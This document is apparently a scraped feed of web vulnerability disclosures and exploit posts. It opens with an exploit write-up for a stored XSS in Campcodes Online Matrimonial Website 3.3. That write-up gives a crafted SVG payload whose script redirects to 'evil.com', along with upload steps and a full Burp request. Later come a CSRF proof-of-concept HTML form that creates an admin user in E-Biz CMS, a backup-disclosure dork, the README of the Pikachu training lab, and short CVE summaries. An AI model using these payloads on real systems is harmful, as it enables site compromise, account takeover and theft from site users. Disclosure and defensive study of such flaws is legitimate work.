install/aiz-uploader/upload in Campcodes Online Matrimonial Website System Script 3.3 allows XSS via a crafted SVG document.

#########################################################################################################################################  
# Exploit Title: Vulnerability in Campcodes Online Matrimonial Website  
System v3.3 allows code execution via malicious SVG file upload  
# Date: 3-8-2023  
# Vendor Homepage:  http://campcodes.com  
# Category: Web Application  
# Exploit Author: Rajdip Dey Sarkar  
# Version: 3.3  
# Tested on: Windows/Kali  
# CVE: CVE-2023-39115  
###########################################################################################################################################

Description:  
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial  
Website System Script v3.3 allows attackers to execute arbitrary code via  
uploading a crafted SVG file.

SVG Payload  
------------------

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert("You have been hacked!!")

      window.location.href="https://evil.com"  
   </script>  
</svg>

Steps to reproduce  
--------------------------

 -Login with your creds  
 -Navigate to this directory - /profile-settings  
 -Click on Gallery -> Add New Image -> Browser -> Add Files  
 -Choose the SVG file and upload done  
 -Click the image!! Payload Triggered

Burp Request  
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Content-Type: multipart/form-data;  
boundary=---------------------------167707198418121100152548123485  
Content-Length: 1044  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create  
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;  
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="relativePath"

null  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="name"

file (1).svg  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="type"

image/svg+xml  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert("You have been hacked!!")

      window.location.href="https://evil.com"  
   </script>  
</svg>  
-----------------------------167707198418121100152548123485--

CVE-2023-39115: Campcodes Online Matrimonial Website System 3.3 Cross Site Scripting ≈ Packet Storm

The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack

CVE-2023-2271

The REST API TO MiniProgram WordPress plugin through 4.6.1 does not have authorisation and CSRF checks in an AJAX action, allowing ay authenticated users, such as subscriber to call and delete arbitrary attachments

CVE-2023-0551

The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when creating and editing its shortcode, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

CVE-2023-0058

Pikachu v1.0 was discovered to contain a SQL injection vulnerability via the $username parameter at \inc\function.php.

    

“如果你想搞懂一个漏洞，比较好的方法是：你可以自己先制造出这个漏洞（用代码编写），然后再利用它，最后再修复它”。

  
\# pikachu

Pikachu是一个带有漏洞的Web应用系统，在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习，那么Pikachu可能正合你意。  

**Pikachu上的漏洞类型列表如下：  
**

*   Burt Force(暴力破解漏洞)  
    
*   XSS(跨站脚本漏洞)  
    
*   CSRF(跨站请求伪造)  
    
*   SQL-Inject(SQL注入漏洞)  
    
*   RCE(远程命令/代码执行)  
    
*   Files Inclusion(文件包含漏洞)  
    
*   Unsafe file downloads(不安全的文件下载)  
    
*   Unsafe file uploads(不安全的文件上传)  
    
*   Over Permisson(越权漏洞)  
    
*   ../../../(目录遍历)  
    
*   I can see your ABC(敏感信息泄露)  
    
*   PHP反序列化漏洞  
    
*   XXE(XML External Entity attack)  
    
*   不安全的URL重定向  
    
*   SSRF(Server-Side Request Forgery)  
    
*   管理工具  
    
*   More...(找找看?..有彩蛋!)  
    

管理工具里面提供了一个简易的xss管理后台,供你测试钓鱼和捞cookie,还可以搞键盘记录！~  
后续会持续更新一些新的漏洞进来,也欢迎你提交漏洞案例给我,最新版本请关注pikachu  
每类漏洞根据不同的情况又分别设计了不同的子类  
同时,为了让这些漏洞变的有意思一些,在Pikachu平台上为每个漏洞都设计了一些小的场景,点击漏洞页面右上角的"提示"可以查看到帮助信息。  

**如何安装和使用**

Pikachu使用世界上最好的语言PHP进行开发-\_-  
数据库使用的是mysql，因此运行Pikachu你需要提前安装好"PHP+MYSQL+中间件（如apache,nginx等）"的基础环境，建议在你的测试环境直接使用 一些集成软件来搭建这些基础环境,比如XAMPP,WAMP等,作为一个搞安全的人,这些东西对你来说应该不是什么难事。接下来:  
\-->把下载下来的pikachu文件夹放到web服务器根目录下;  
\-->根据实际情况修改inc/config.inc.php里面的数据库连接配置;  
\-->访问h ttp://x.x.x.x/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化，点击进行初始化安装!",点击即可完成安装。

如果阁下对Pikachu使用上有什么疑问，可以在QQ群：532078894（已满），973351978（未满） 咨询，虽然咨询了，也不一定有人回答-\_-。

**Docker**

使用已有构建：

docker run -d -p 8765:80 8023/pikachu-expect:latest

本地构建：

如果你熟悉docker,也可以直接用docker部署
docker build -t "pikachu" .
docker run -d -p 8080:80 pikachu

**切记**

"少就是多,慢就是快"

**WIKI**

点击进入

CVE-2023-39849: GitHub - zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : E-Biz CMS v2.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : https://softech.pk/                                                                                                |    
| # Dork      : Copyright © 2019, Designed By SOFTECH                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

[+] infected file : /add_user.php.

[+] http://127.0.0.1/q7.3/softpanel/add_user.php.

[+] save code as poc.html .

    <h1>Add User</h1>  
    </div>  
      
    <div class="site">  
      <div class="container">  
        <div class="grid-16">

                          <div class="widget" >  
            <div class="widget-header"> <span class="icon-wrench"></span>  
              <h3>Add User </h3>  
            </div>  
              
            <div class="widget-content">  
                
                
                
              <form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
                <table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
                  <tr>  
                    <td width="527" align="left"><strong>Name : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Email :</strong> </td>  
                  </tr>  
                  <tr>  
                    <td><span class="field">  
                      <input name="email"  type="text" id="date"  class="validate[required,custom[email]" size="50" />  
                    </span></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Password :</strong></td>  
                  </tr>  
                  <tr>  
                    <td><div class="field">  
                    <input name="password"  type="text" id="date_English" class="validate[required]" size="50" />          
                  </div> </td>  
                  </tr>  
                  <tr>  
                    <td><strong>Access : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><select name="type" id="type" >  
                        <option value="user" selected="selected">User</option>  
                      <option value="admin">Admin</option>  
                    </select>                           </td>  
                  </tr>  
                  <tr id="link">  
                    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
                        <tr>  
                          <td height="30"><strong id="">Privileges:</strong></td>  
                        </tr>  
                        <tr>  
                          <td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">

                                                        <tr>  
                              <td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
                                <tr>  
                                  <td height="25"><label for="label">Company News</label></td>  
                                  <td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25">Home Banners</td>  
                                  <td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Gallery</td>  
                                  <td><input type="checkbox" id="gal" name="gallery" value="Y"  onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25"><label for="sim">Simple Gallery</label></td>  
                                  <td><input type="checkbox" id="gallery" name="simple_gallery" value="Y"  onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                                                                                                                                                                                                              <tr>  
                                  <td height="25">Pages</td>  
                                  <td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Newsletter</td>  
                                  <td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                                  <tr>  
                                  <td height="25">Categories</td>  
                                  <td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                             </table>                                </td>  
                            </tr>

                                                      </table>                            </td>  
                        </tr>  
                      </table></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>

                                                      <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                </table>  
                </td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>                                          </td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td><button  name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>

  <button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
                  </tr>  
                </table>  
              </form>  
            </div>

Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================

E-Biz CMS 2.0 Cross Site Request Forgery

Cross Site Request Forgery (CSRF) vulnerability in `xxl-job-admin/user/add` in xuxueli xxl-job version 2.2.0 allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2020-24922

**xuxueli xxl-job Cross-Site Request Forgery Vulnerability**

Moderate severity GitHub Reviewed Published Aug 11, 2023 to the GitHub Advisory Database • Updated Aug 11, 2023

**Package**

maven com.xuxueli:xxl-job (Maven)

**Affected versions**

<= 2.2.0

Published to the GitHub Advisory Database

Aug 11, 2023

Last updated

Aug 11, 2023

GHSA-jp5r-4x9q-4vcf: xuxueli xxl-job Cross-Site Request Forgery Vulnerability

Cross Site Request Forgery (CSRF) vulnerability in yzmcms version 5.6, allows remote attackers to escalate privileges and gain sensitive information sitemodel/add.html endpoint.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-23595: CSRF Vulnerability in v5.6 · Issue #47 · yzmcms/yzmcms

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

Tag

#csrf